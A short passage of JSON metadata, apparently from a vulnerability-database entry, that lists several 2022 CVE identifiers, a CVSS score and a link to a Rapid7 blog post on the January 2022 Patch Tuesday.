"CVE-2022-21930", "CVE-2022-21931", "CVE-2022-21932", "CVE-2022-21954", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964", "CVE-2022-21969", "CVE-2022-21970"], "modified": "2022-01-11T21:41:56", "id": "RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "href": "https://blog.rapid7.com/2022/01/11/patch-tuesday-january-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}